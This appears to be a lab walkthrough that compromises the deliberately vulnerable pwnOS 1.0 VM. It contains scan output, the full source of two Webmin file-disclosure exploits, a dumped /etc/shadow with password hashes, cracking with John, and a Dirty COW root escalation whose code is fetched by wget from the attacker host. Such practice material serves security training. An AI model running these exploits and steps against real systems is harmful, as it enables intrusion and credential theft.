Red Team Target Practice: PWNOS: 1.0

Information Gathering

1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:e6:0b:60       VMware, Inc.
192.168.16.140  00:0c:29:5e:18:c9       VMware, Inc.
192.168.16.254  00:50:56:e5:ee:15       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.387 seconds (107.25 hosts/sec). 4 responded


2. netdiscover
netdiscover -r 192.168.16.0/24


 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.16.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.16.2    00:50:56:e6:0b:60      1      60  VMware, Inc.
 192.168.16.140  00:0c:29:5e:18:c9      1      60  VMware, Inc.
 192.168.16.254  00:50:56:e5:ee:15      1      60  VMware, Inc.


3. nmap
Host discovery

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.16.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:04 CST
Nmap scan report for 192.168.16.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:E6:0B:60 (VMware)
Nmap scan report for 192.168.16.140
Host is up (0.00021s latency).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.0012s latency).
MAC Address: 00:50:56:E5:EE:15 (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.34 seconds


Port scan

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:04 CST
Nmap scan report for 192.168.16.140
Host is up (0.0021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds
┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk '{print $1}' | head -n 10 | tail -n 5 | awk -F "/" '{print $1}' | xargs -n 5 | sed 's/ /,/g'
22,80,139,445,10000


Service and version detection

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -p 22,80,139,445,10000 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:13 CST
Nmap scan report for 192.168.16.140
Host is up (0.00025s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_  2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/0.01
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   NetBIOS computer name:
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|_  System time: 2023-12-07T10:52:07-06:00
|_clock-skew: mean: -2d17h21m17s, deviation: 4h14m34s, median: -2d20h21m18s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.27 seconds


Vulnerability scan

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,80,139,445,10000 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:15 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.16.140
Host is up (0.00019s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|   /index/: Potentially interesting folder
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_      http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false

Nmap done: 1 IP address (1 host up) scanned in 345.26 seconds


4. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.16.140          
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.16.140
+ Target Hostname:    192.168.16.140
+ Target Port:        80
+ Start Time:         2023-12-10 21:13:56 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
+ /: Retrieved x-powered-by header: PHP/5.2.3-1ubuntu6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.3-1ubuntu6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.4 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /php/: Directory indexing found.
+ /php/: This might be interesting.
+ /icons/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 294754, size: 4872, mtime: Fri Jun 25 03:46:08 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /index1.php: PHP include error may indicate local or remote file inclusion is possible.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2023-12-10 21:14:12 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Directory enumeration

1. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.140 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 295]
/index2               (Status: 200) [Size: 156]
/php                  (Status: 301) [Size: 332] [--> http://192.168.16.140/php/]
/index1               (Status: 200) [Size: 1104]
/server-status        (Status: 403) [Size: 313]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================


2. dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.16.140 -e*

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.16.140/_23-12-10_21-27-19.txt

Error Log: /root/.dirsearch/logs/errors-23-12-10_21-27-19.log

Target: http://192.168.16.140/

[21:27:19] Starting:
[21:27:19] 301 -  332B  - /php  ->  http://192.168.16.140/php/
[21:27:40] 200 -  295B  - /index
[21:27:40] 200 -  295B  - /index.php
[21:27:40] 200 -  295B  - /index.php/login/
[21:27:40] 200 -  156B  - /index2
[21:27:40] 200 -  156B  - /index2.php
[21:27:46] 200 -  896B  - /php/

Task Completed


WEB

1. Port 80



Clicking it redirects here!



It requires a password; without one it errors out. We can also see its version number!

2. Port 10000


We don't know the username or password!

File inclusion


Testing shows that the home page has a file inclusion vulnerability. We can read the passwd file, so let's gather some information from it!

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

Beyond these there is nothing else of interest!

searchsploit

1. Webmin vulnerabilities
┌──(root㉿ru)-[~/kali]
└─# searchsploit Webmin
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' D | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclus | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File In | php/webapps/2451.txt
Webmin - Brute Force / Command Execution      | multiple/remote/705.pl
webmin 0.91 - Directory Traversal             | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Sessi | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation       | linux/remote/21765.pl
Webmin 0.x - Code Input Validation            | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution  | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)            | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Comman | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities       | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Meta | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Comma | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution          | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Ex | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypas | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request F | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Req | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authent | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (A | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution     | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary  | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary  | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execut | linux/webapps/47330.rb
---------------------------------------------- ---------------------------------
Shellcodes: No Results



That turns up a lot. First we only want Webmin vulnerabilities, and we skip the ones marked Authenticated, because we don't know the Webmin username or password at all! The CSRF ones are set aside for now.
Combined with the earlier nmap vuln script results, we should focus on the file disclosure (Arbitrary File Disclosure) entries; 1997 and 2017 both work, and I chose the Perl one here!


┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 2017.pl
  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/2017
     Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
    Codes: CVE-2006-3392
 Verified: True
File Type: Perl script text executable
Copied to: /root/kali/2017.pl



┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 1997.php
  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/1997
     Path: /usr/share/exploitdb/exploits/multiple/remote/1997.php
    Codes: OSVDB-26772, CVE-2006-3392
 Verified: True
File Type: PHP script, ASCII text
Copied to: /root/kali/1997.php

2. payload
2017.pl

┌──(root㉿ru)-[~/kali]
└─# cat 2017.pl
#!/usr/bin/perl
#               Exploit for WEBMIN and USERMIN  less than 1.29x
#               ARBITARY REMOTE FILE DISCLOSURE
#               WORKS FOR HTTP AND HTTPS (NOW)
#               Thrusday 13th  July 2006
#               Vulnerability Disclosure at securitydot.net
#               Coded by UmZ! umz32.dll _at_ gmail.com
#
#
#
#               Make sure you have LWP before using this exploit.
#               USE IT AT YOUR OWN RISK
#
#               GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
#               for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



#               Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
                    print("Usage: $0 <url> <port> <filename> <target> \n");
                    print("TARGETS are\n ");
                    print("0  - > HTTP \n");
                    print(" 1  - > HTTPS\n");
                    print("Define full path with file name \n");
                    print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
                    exit(1);
                    }

                    ($target, $port,$filename, $tar) = @ARGV;

                print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
                print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
                print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
                print("Attacking $target on port $port!\n");
                print("FILENAME:  $filename\n");


                $temp="/..%01" x 40;

                if ($tar == '0')
                        { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
                        $content=get $url;

                        print("\n FILE CONTENT STARTED");
                        print("\n -----------------------------------\n");

                        print("$content");
                        print("\n -------------------------------------\n");
                        }


                elsif ($tar == '1')
                         {
                        my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
                        my $req = HTTP::Request->new(GET => $url);
                        my $res = $userag->request($req);
                        if ($res->is_success) {
                                print("FILE CONTENT STARTED\n");
                                print("-------------------------------------------\n");
                                print $res->as_string;
                                print("-------------------------------------------\n");
                                                }
                        else {
                        print "Failed: ", $res->status_line, "\n";
                             }
                        }

# milw0rm.com [2006-07-15] 


1997.php

┌──(root㉿ru)-[~/kali]
└─# cat 1997.php
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date :  2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/..%01";
for ($i=0;$i<60;$i++) {
        $z.="/..%01";
}

$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
        // IF INPUT IS NOT CORRECT DISPLAY THE README
        echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
        echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
        echo "Coded by joffer , http://securitydot.net\n";
}

?>

# milw0rm.com [2006-07-09]  


Both work in much the same way; either exploit can be used to read files!


┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 /etc/shadow
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.16.140 on port 10000!
FILENAME:  /etc/shadow

 FILE CONTENT STARTED
 -----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

 -------------------------------------


The file disclosure vulnerability is confirmed! There are four password hashes in total. On to the next step!

john

┌──(root㉿ru)-[~/kali]
└─# john username --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:28 32.88% (ETA: 23:17:59) 0g/s 32401p/s 162011c/s 162011C/s ovnirosy..ovidmesh
0g 0:00:03:24 45.57% (ETA: 23:17:56) 0g/s 32024p/s 160124c/s 160124C/s kendyl91..kendri30
h4ckm3           (vmware)
1g 0:00:06:11 89.04% (ETA: 23:17:25) 0.002695g/s 34015p/s 156538c/s 156538C/s 2324567..2324126
1g 0:00:06:49 DONE (2023-12-10 23:17) 0.002442g/s 34443p/s 156332c/s 156332C/s  enter09..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


OK, we cracked one username and password!

vmware:h4ckm3


SSH login

┌──(root㉿ru)-[~/kali]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@192.168.16.140
vmware@192.168.16.140's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ id
uid=1000(vmware) gid=1000(vmware) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),111(lpadmin),112(admin),1000(vmware)
vmware@ubuntuvm:~$


We have an initial shell, but its privileges are too low!

Privilege escalation 1

vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ ls
vmware@ubuntuvm:~$ ls -al
total 28
drwxr-xr-x 3 vmware vmware 4096 2008-06-19 10:11 .
drwxr-xr-x 6 root   root   4096 2008-06-11 09:26 ..
-rw------- 1 vmware vmware   65 2008-06-20 14:39 .bash_history
-rw-r--r-- 1 vmware vmware  220 2008-06-10 07:10 .bash_logout
-rw-r--r-- 1 vmware vmware 2298 2008-06-10 07:10 .bashrc
-rw-r--r-- 1 vmware vmware  566 2008-06-10 07:10 .profile
drwx------ 2 vmware vmware 4096 2008-06-12 11:19 .ssh
-rw-r--r-- 1 vmware vmware    0 2008-06-10 12:43 .sudo_as_admin_successful
vmware@ubuntuvm:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/smbumount
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/at
/usr/bin/chsh
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/apache2/suexec
/bin/su
/bin/umount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/fusermount
/bin/mount
/sbin/mount.cifs
/sbin/umount.cifs
/lib/dhcp3-client/call-dhclient-script
vmware@ubuntuvm:~$


Dirty COW privilege escalation
vmware@ubuntuvm:/tmp$ wget http://192.168.16.128/dirty.c
--13:11:07--  http://192.168.16.128/dirty.c
           => `dirty.c'
Connecting to 192.168.16.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,815 (4.7K) [text/x-c]

100%[====================================>] 4,815         --.--K/s

13:11:07 (673.80 MB/s) - `dirty.c' saved [4815/4815]

vmware@ubuntuvm:/tmp$ ls
dirty.c  sqllS3Hev
vmware@ubuntuvm:/tmp$ chmod +x dirty.c


vmware@ubuntuvm:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
vmware@ubuntuvm:/tmp$ ls
dirty  dirty.c  sqllS3Hev

vmware@ubuntuvm:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash

mmap: b7f6b000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
vmware@ubuntuvm:/tmp$ madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

vmware@ubuntuvm:/tmp$ ls
dirty  dirty.c  passwd.bak  sqllS3Hev
vmware@ubuntuvm:/tmp$ cat /etc/passwd
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
